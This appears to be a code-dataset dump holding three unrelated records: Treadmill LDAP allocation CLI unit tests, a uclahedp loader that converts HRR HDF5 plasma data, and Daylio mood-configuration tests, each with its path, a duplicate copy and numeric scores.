@mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete_nonexistent(self): """Test deleting nonexistent assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.nonexistent*', '--delete' ] ) self.assertEqual(res.exit_code, 0) # Assignment should be untouched ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, ) if __name__ == '__main__': unittest.main()
lib/python/treadmill/tests/cli/admin/ldap/allocation_test.py
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import unittest import click import click.testing import mock import treadmill from treadmill import plugin_manager from treadmill.admin import exc as admin_exceptions class AdminLdapAllocationTest(unittest.TestCase): """Mock test for treadmill.cli.admin.ldap.allocation""" def setUp(self): """Setup common test variables""" self.runner = click.testing.CliRunner() self.alloc_mod = plugin_manager.load( 'treadmill.cli.admin.ldap', 'allocation' ) self.alloc_cli = self.alloc_mod.init() @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.side_effect': admin_exceptions.NoSuchObjectResult, 'create.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_create(self): """Test creating a tenant. """ tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '123', ] ) self.assertEqual(res.exit_code, 0) tenant_admin.get.assert_called_once_with('test') tenant_admin.create.assert_called_once_with( 'test', {'systems': ['123']} ) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, 'update.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_update(self): """Test update a tenant twice. One with appending systems, Second with setting systems. """ tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '--add-systems', '456' ] ) self.assertEqual(res.exit_code, 0) res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '456', ] ) self.assertEqual(res.exit_code, 0) get_calls = [mock.call('test')] * 2 tenant_admin.get.assert_has_calls( get_calls, any_order=False ) update_calls = [ mock.call('test', {'systems': ['123', '456']}), mock.call('test', {'systems': ['456']}) ] tenant_admin.update.assert_has_calls( update_calls, any_order=False ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None, 'get.side_effect': admin_exceptions.NoSuchObjectResult, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_create(self): """Test creating a reservation. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.create.assert_called_once_with( ['cell', 'test/dev'], { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_update(self): """Test updating a reservation. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--rank', 99, '--partition', 'fake', '-c', '58%', '--memory', '66M' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'cpu': '58%', 'memory': '66M', 'partition': 'fake', 'rank': 99 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'delete.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) def test_reservation_delete(self): """Test deleting a reservation. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_not_called() ca_admin.delete.assert_called_once_with(['cell', 'test/dev']) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update(self): """Test updating assignment, append assignment to existing assignments. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': {'cell': 'cell'}, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_empty(self): """Test updating assignment, append assignment to empty cell alloc. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 1}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_priority(self): """Test updating assignment, update priority of an existing assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '100', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 100}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete(self): """Test deleting assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete_nonexistent(self): """Test deleting nonexistent assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.nonexistent*', '--delete' ] ) self.assertEqual(res.exit_code, 0) # Assignment should be untouched ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, ) if __name__ == '__main__': unittest.main()
0.700485
0.16398
import numpy as np from astropy import units as u import os from uclahedp.tools import csv as csvtools from uclahedp.tools import hdf as hdftools from uclahedp.tools import util import h5py def hrrToRaw( run, probe, hdf_dir, csv_dir, dest, verbose=False, debug=False): """ Retreives the appropriate metadata for a run and probe in a given data directory, then reads in the data from the HRR hdf5 output file. Parameters ---------- run: int Run number probe: str Probe name hdf_dir: str (path) Path to the directory where HDF files are stored csv_dir: str(path) Path to the directory where metadata CSV's are stored dest: hdfPath object Path string to location data should be written out verbose: boolean Set this flag to true to enable print statements throughout the code, including a runtime-until-completion estimate during the data reading loop. Returns ------- dest (Filepath to destination file) """ #Create a dictionary of attributes from the entire directory of CSV #files that applies to this probe and run attrs = csvtools.getAllAttrs(csv_dir, run, probe) #Check that some required keys are present, throw a fatal error if not req_keys = ['datafile'] csvtools.missingKeys(attrs, req_keys, fatal_error=True) #TODO: Should this file take a data_dir and determine the filename #automatically, or should a source hdf file be given, leaving the program #that calls this one to determine the HDF file name? src = os.path.join(hdf_dir, attrs['datafile'][0] + '.hdf5') #Create an array of channels #channel_arr = tuples of form (resource number, channel number) #Indexd from 1, to match load/LAPD.py channel_arr = [] nchan = 1 while True: digistr = 'resource' + str(int(nchan)) chanstr = 'chan' + str(int(nchan)) if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted channel_arr.append( (attrs[digistr][0], attrs[chanstr][0]) ) nchan = nchan + 1 else: break if debug: print("{:.0f} Data Channels found in csv".format( len(channel_arr))) #Create a dictionary of position channels #channel_arr = tuples of form (resource number, channel number) ax = ['x', 'y', 'z'] pos_chan = {} nchan = 1 for i in range(3): digistr = ax[i] + 'pos_resource' chanstr = ax[i] + 'pos_chan' if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted pos_chan[ax[i]] = ( attrs[digistr][0], attrs[chanstr][0]) else: pos_chan[ax[i]] = None else: pos_chan[ax[i]] = None if debug: print("{:.0f} Pos Channels found in csv".format(len(pos_chan))) #Determine the number of channels from the channel array nchan = len(channel_arr) #Read some variables from the src file with h5py.File(src, 'r') as sf: digi_name = 'RESOURCE ' + str(channel_arr[0][0]) print(digi_name) digigrp = sf[digi_name] resource_type = digigrp.attrs['RESOURCE TYPE'].decode('utf-8') attrs['RESOURCE ALIAS'] = (digigrp.attrs['RESOURCE ALIAS'].decode('utf-8'),'') attrs['RESOURCE DESCRIPTION'] = (digigrp.attrs['RESOURCE DESCRIPTION'].decode('utf-8'),'') attrs['RESOURCE ID'] = (digigrp.attrs['RESOURCE ID'],'') attrs['RESOURCE MODEL'] = (digigrp.attrs['RESOURCE MODEL'].decode('utf-8'),'') attrs['RESOURCE TYPE'] = (resource_type,'') resource_unit = digigrp['CHANNEL 0']['UNITS'][0].decode('utf-8') attrs['motion_unit'] = ('mm', '') if resource_type == 'SCOPE': dataname = 'TRACE' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = digigrp['CHANNEL 0'][dataname].shape[1] dt = digigrp['CHANNEL 0'][dataname].attrs['WAVEFORM DT'] * u.s attrs['dt'] = [str(dt.value), str(dt.unit) ] #attrs['dt'] = [s.encode('utf-8') for s # in [str(dt.value), str(dt.unit) ] ] elif resource_type == 'MOTOR BOARD': dataname = 'POSITION' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = 1 #Create the destination file with h5py.File(dest.file, "a") as df: #Create the dest group, throw error if it exists if dest.group is not '/' and dest.group in df.keys(): raise hdftools.hdfGroupExists(dest) grp = df[dest.group] #Initialize the output data array if 'data' in grp.keys(): raise hdftools.hdfDatasetExists(str(dest) + ' -> ' + "'data'") #Create the dataset + associated attributes grp.require_dataset("data", (nshots, nti, nchan), np.float32, chunks=(1, np.min([nti, 20000]), 1), compression='gzip') grp['data'].attrs['unit'] = resource_unit dimlabels = ['shots', 'time', 'chan'] grp['data'].attrs['dimensions'] = [s.encode('utf-8') for s in dimlabels] #Open the hdf5 file and copy the data over with h5py.File(src) as sf: #Initialize time-remaining printout tr = util.timeRemaining(nchan*nshots) #Loop through the channels and shots, reading one-by-one into the #output dataset for chan in range(nchan): digi_name = 'RESOURCE ' + str(channel_arr[chan][0]) chan_name = 'CHANNEL ' + str(channel_arr[chan][1]) if verbose: print("Reading channel: " + str(chan+1) + '/' + str(nchan)) for shot in range(nshots): if verbose: tr.updateTimeRemaining(nshots*chan + shot) #Read the data from the hdf5 file grp['data'][shot,:,chan] = sf[digi_name][chan_name][dataname][shot, ...] if pos_chan['x'] is not None or pos_chan['y'] is not None or pos_chan['z'] is not None: grp.require_dataset('pos', (nshots, 3), np.float32) ax = ['x', 'y', 'z'] unit_factor = (1.0*u.Unit(attrs['motion_unit'][0])).to(u.cm).value attrs['motion_unit'] = ('cm', '') for i, a in enumerate(ax): if pos_chan[a] is not None: resname = 'RESOURCE ' + str(pos_chan[a][0]) channame = 'CHANNEL ' + str(int(pos_chan[a][1])) try: posdata = sf[resname][channame]['POSITION'][:]*unit_factor except KeyError: print("(!) POSITION Information not found for " + resname) print("If motion is not included in run, set resource to NA in csv") #Handle the case where the multiple data points were #taken at a position so npos!=nshots npos = posdata.size if npos != nshots: posdata = np.repeat(posdata, int(nshots/npos)) grp['pos'][:, i] = posdata else: grp['pos'][:, i] = np.zeros(nshots) #Create the axes grp.require_dataset('shots', (nshots,), np.float32, chunks=True )[:] = np.arange(nshots) grp['shots'].attrs['unit'] = '' grp.require_dataset('chan', (nchan,), np.float32, chunks=True)[:] = np.arange(nchan) grp['chan'].attrs['unit'] = '' if resource_type == 'SCOPE': t = np.arange(nti)*dt grp.require_dataset('time', (nti,), np.float32, chunks=True)[:] = t.value grp['time'].attrs['unit'] = str(t.unit) #Write the attrs dictioanry into attributes of the new data group hdftools.writeAttrs(attrs, grp) return dest #Simple test program if __name__ == "__main__": #hdf_dir = os.path.join("F:", "LAPD_Mar2018", "HDF") #csv_dir = os.path.join("F:", "LAPD_Mar2018", "METADATA") #dest = hdftools.hdfPath( r"F:/LAPD_Mar2018/RAW/run102_PL11B_raw.hdf5") probe = 'tdiode' #probe = 'PLL_B1' run = 6 hdf_dir = '/Volumes/PVH_DATA/2019BIERMANN/HDF/' csv_dir = '/Volumes/PVH_DATA/2019BIERMANN/METADATA/' dest = hdftools.hdfPath( '/Volumes/PVH_DATA/2019BIERMANN/RAW/' + 'run' + str(run) + '_' + probe + '_raw.hdf5') #Delete the output file if it already exists try: os.remove(dest.file) except FileNotFoundError: pass print('reading') util.mem() tstart = util.timeTest() x = hrrToRaw(run, probe, hdf_dir, csv_dir, dest, verbose=True) util.timeTest(t0=tstart) util.mem() print('done')
uclahedp/load/hrr.py
import numpy as np from astropy import units as u import os from uclahedp.tools import csv as csvtools from uclahedp.tools import hdf as hdftools from uclahedp.tools import util import h5py def hrrToRaw( run, probe, hdf_dir, csv_dir, dest, verbose=False, debug=False): """ Retreives the appropriate metadata for a run and probe in a given data directory, then reads in the data from the HRR hdf5 output file. Parameters ---------- run: int Run number probe: str Probe name hdf_dir: str (path) Path to the directory where HDF files are stored csv_dir: str(path) Path to the directory where metadata CSV's are stored dest: hdfPath object Path string to location data should be written out verbose: boolean Set this flag to true to enable print statements throughout the code, including a runtime-until-completion estimate during the data reading loop. Returns ------- dest (Filepath to destination file) """ #Create a dictionary of attributes from the entire directory of CSV #files that applies to this probe and run attrs = csvtools.getAllAttrs(csv_dir, run, probe) #Check that some required keys are present, throw a fatal error if not req_keys = ['datafile'] csvtools.missingKeys(attrs, req_keys, fatal_error=True) #TODO: Should this file take a data_dir and determine the filename #automatically, or should a source hdf file be given, leaving the program #that calls this one to determine the HDF file name? src = os.path.join(hdf_dir, attrs['datafile'][0] + '.hdf5') #Create an array of channels #channel_arr = tuples of form (resource number, channel number) #Indexd from 1, to match load/LAPD.py channel_arr = [] nchan = 1 while True: digistr = 'resource' + str(int(nchan)) chanstr = 'chan' + str(int(nchan)) if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted channel_arr.append( (attrs[digistr][0], attrs[chanstr][0]) ) nchan = nchan + 1 else: break if debug: print("{:.0f} Data Channels found in csv".format( len(channel_arr))) #Create a dictionary of position channels #channel_arr = tuples of form (resource number, channel number) ax = ['x', 'y', 'z'] pos_chan = {} nchan = 1 for i in range(3): digistr = ax[i] + 'pos_resource' chanstr = ax[i] + 'pos_chan' if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted pos_chan[ax[i]] = ( attrs[digistr][0], attrs[chanstr][0]) else: pos_chan[ax[i]] = None else: pos_chan[ax[i]] = None if debug: print("{:.0f} Pos Channels found in csv".format(len(pos_chan))) #Determine the number of channels from the channel array nchan = len(channel_arr) #Read some variables from the src file with h5py.File(src, 'r') as sf: digi_name = 'RESOURCE ' + str(channel_arr[0][0]) print(digi_name) digigrp = sf[digi_name] resource_type = digigrp.attrs['RESOURCE TYPE'].decode('utf-8') attrs['RESOURCE ALIAS'] = (digigrp.attrs['RESOURCE ALIAS'].decode('utf-8'),'') attrs['RESOURCE DESCRIPTION'] = (digigrp.attrs['RESOURCE DESCRIPTION'].decode('utf-8'),'') attrs['RESOURCE ID'] = (digigrp.attrs['RESOURCE ID'],'') attrs['RESOURCE MODEL'] = (digigrp.attrs['RESOURCE MODEL'].decode('utf-8'),'') attrs['RESOURCE TYPE'] = (resource_type,'') resource_unit = digigrp['CHANNEL 0']['UNITS'][0].decode('utf-8') attrs['motion_unit'] = ('mm', '') if resource_type == 'SCOPE': dataname = 'TRACE' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = digigrp['CHANNEL 0'][dataname].shape[1] dt = digigrp['CHANNEL 0'][dataname].attrs['WAVEFORM DT'] * u.s attrs['dt'] = [str(dt.value), str(dt.unit) ] #attrs['dt'] = [s.encode('utf-8') for s # in [str(dt.value), str(dt.unit) ] ] elif resource_type == 'MOTOR BOARD': dataname = 'POSITION' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = 1 #Create the destination file with h5py.File(dest.file, "a") as df: #Create the dest group, throw error if it exists if dest.group is not '/' and dest.group in df.keys(): raise hdftools.hdfGroupExists(dest) grp = df[dest.group] #Initialize the output data array if 'data' in grp.keys(): raise hdftools.hdfDatasetExists(str(dest) + ' -> ' + "'data'") #Create the dataset + associated attributes grp.require_dataset("data", (nshots, nti, nchan), np.float32, chunks=(1, np.min([nti, 20000]), 1), compression='gzip') grp['data'].attrs['unit'] = resource_unit dimlabels = ['shots', 'time', 'chan'] grp['data'].attrs['dimensions'] = [s.encode('utf-8') for s in dimlabels] #Open the hdf5 file and copy the data over with h5py.File(src) as sf: #Initialize time-remaining printout tr = util.timeRemaining(nchan*nshots) #Loop through the channels and shots, reading one-by-one into the #output dataset for chan in range(nchan): digi_name = 'RESOURCE ' + str(channel_arr[chan][0]) chan_name = 'CHANNEL ' + str(channel_arr[chan][1]) if verbose: print("Reading channel: " + str(chan+1) + '/' + str(nchan)) for shot in range(nshots): if verbose: tr.updateTimeRemaining(nshots*chan + shot) #Read the data from the hdf5 file grp['data'][shot,:,chan] = sf[digi_name][chan_name][dataname][shot, ...] if pos_chan['x'] is not None or pos_chan['y'] is not None or pos_chan['z'] is not None: grp.require_dataset('pos', (nshots, 3), np.float32) ax = ['x', 'y', 'z'] unit_factor = (1.0*u.Unit(attrs['motion_unit'][0])).to(u.cm).value attrs['motion_unit'] = ('cm', '') for i, a in enumerate(ax): if pos_chan[a] is not None: resname = 'RESOURCE ' + str(pos_chan[a][0]) channame = 'CHANNEL ' + str(int(pos_chan[a][1])) try: posdata = sf[resname][channame]['POSITION'][:]*unit_factor except KeyError: print("(!) POSITION Information not found for " + resname) print("If motion is not included in run, set resource to NA in csv") #Handle the case where the multiple data points were #taken at a position so npos!=nshots npos = posdata.size if npos != nshots: posdata = np.repeat(posdata, int(nshots/npos)) grp['pos'][:, i] = posdata else: grp['pos'][:, i] = np.zeros(nshots) #Create the axes grp.require_dataset('shots', (nshots,), np.float32, chunks=True )[:] = np.arange(nshots) grp['shots'].attrs['unit'] = '' grp.require_dataset('chan', (nchan,), np.float32, chunks=True)[:] = np.arange(nchan) grp['chan'].attrs['unit'] = '' if resource_type == 'SCOPE': t = np.arange(nti)*dt grp.require_dataset('time', (nti,), np.float32, chunks=True)[:] = t.value grp['time'].attrs['unit'] = str(t.unit) #Write the attrs dictioanry into attributes of the new data group hdftools.writeAttrs(attrs, grp) return dest #Simple test program if __name__ == "__main__": #hdf_dir = os.path.join("F:", "LAPD_Mar2018", "HDF") #csv_dir = os.path.join("F:", "LAPD_Mar2018", "METADATA") #dest = hdftools.hdfPath( r"F:/LAPD_Mar2018/RAW/run102_PL11B_raw.hdf5") probe = 'tdiode' #probe = 'PLL_B1' run = 6 hdf_dir = '/Volumes/PVH_DATA/2019BIERMANN/HDF/' csv_dir = '/Volumes/PVH_DATA/2019BIERMANN/METADATA/' dest = hdftools.hdfPath( '/Volumes/PVH_DATA/2019BIERMANN/RAW/' + 'run' + str(run) + '_' + probe + '_raw.hdf5') #Delete the output file if it already exists try: os.remove(dest.file) except FileNotFoundError: pass print('reading') util.mem() tstart = util.timeTest() x = hrrToRaw(run, probe, hdf_dir, csv_dir, dest, verbose=True) util.timeTest(t0=tstart) util.mem() print('done')
0.30965
0.389488
from unittest import TestCase from daylio_parser.config import ( DEFAULT_COLOR_PALETTE, DEFAULT_MOODS, Mood, MoodConfig, MoodNotFound, ) class TestConfig(TestCase): def test_default_mood_list(self): """Test that the default config contains 5 moods with known boundaries.""" m = MoodConfig() self.assertEqual(m.moods[0].name, 'awful') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[0].color, DEFAULT_COLOR_PALETTE[0]) self.assertEqual(m.moods[1].name, 'bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[1].color, DEFAULT_COLOR_PALETTE[1]) self.assertEqual(m.moods[2].name, 'meh') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[2].color, DEFAULT_COLOR_PALETTE[2]) self.assertEqual(m.moods[3].name, 'good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, (3.5, 4.5)) self.assertEqual(m.moods[3].color, DEFAULT_COLOR_PALETTE[3]) self.assertEqual(m.moods[4].name, 'rad') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) self.assertEqual(m.moods[4].color, DEFAULT_COLOR_PALETTE[4]) def test_custom_moods(self): """Here we test that custom moods have correctly computed boundaries.""" moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), ] m = MoodConfig(moods) self.assertEqual(m.moods[0].name, 'bad') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[1].name, 'almost bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[2].name, 'neutral') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[3].name, 'almost good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, (3.5, 4.5)) self.assertEqual(m.moods[4].name, 'good') self.assertEqual(m.moods[4].level, 5) self.assertEqual(m.moods[4].boundaries, (4.5, 5.01)) def test_validation(self): """Test wrong mood lists.""" # Only 1 mood moods = [ (1, 'bad', 'red'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Bad formatting moods = [ ('bad',), ('almost bad',), ('neutral',), ('almost good',), ('good',), ] with self.assertRaises(ValueError): MoodConfig(moods) # Missing level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (4, 'good'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong level moods = [ (1, 'bad'), (2, 'almost bad'), (3, 'neutral'), (4, 'almost good'), (5, 'good'), (6, 'rad'), ] with self.assertRaises(ValueError): MoodConfig(moods) # Wrong palette colors = [ 'red', ] with self.assertRaises(ValueError): MoodConfig(DEFAULT_MOODS, colors) def test_custom_colors(self): """Test custom color palette.""" colors = [ 'black', 'red', 'orange', 'yellow', 'green', ] m = MoodConfig(DEFAULT_MOODS, colors) self.assertEqual(m.moods[0].color, 'black') self.assertEqual(m.moods[1].color, 'red') self.assertEqual(m.moods[2].color, 'orange') self.assertEqual(m.moods[3].color, 'yellow') self.assertEqual(m.moods[4].color, 'green') def test_get_mood(self): """Test getter by mood name.""" m = MoodConfig() expected = Mood('good', 4, '#4CA369', (3.5, 4.5)) self.assertEqual(m.get('good'), expected) def test_get_mood_missing(self): m = MoodConfig() with self.assertRaises(MoodNotFound): m.get("this does not exist")
tests/test_config.py
from unittest import TestCase from daylio_parser.config import ( DEFAULT_COLOR_PALETTE, DEFAULT_MOODS, Mood, MoodConfig, MoodNotFound, ) class TestConfig(TestCase): def test_default_mood_list(self): """Test that the default config contains 5 moods with known boundaries.""" m = MoodConfig() self.assertEqual(m.moods[0].name, 'awful') self.assertEqual(m.moods[0].level, 1) self.assertEqual(m.moods[0].boundaries, (1, 1.5)) self.assertEqual(m.moods[0].color, DEFAULT_COLOR_PALETTE[0]) self.assertEqual(m.moods[1].name, 'bad') self.assertEqual(m.moods[1].level, 2) self.assertEqual(m.moods[1].boundaries, (1.5, 2.5)) self.assertEqual(m.moods[1].color, DEFAULT_COLOR_PALETTE[1]) self.assertEqual(m.moods[2].name, 'meh') self.assertEqual(m.moods[2].level, 3) self.assertEqual(m.moods[2].boundaries, (2.5, 3.5)) self.assertEqual(m.moods[2].color, DEFAULT_COLOR_PALETTE[2]) self.assertEqual(m.moods[3].name, 'good') self.assertEqual(m.moods[3].level, 4) self.assertEqual(m.moods[3].boundaries, (3.5, 4.5)) self.assertEqual(m.moods[3].color, DEFAULT_COLOR_PALETTE[3]) 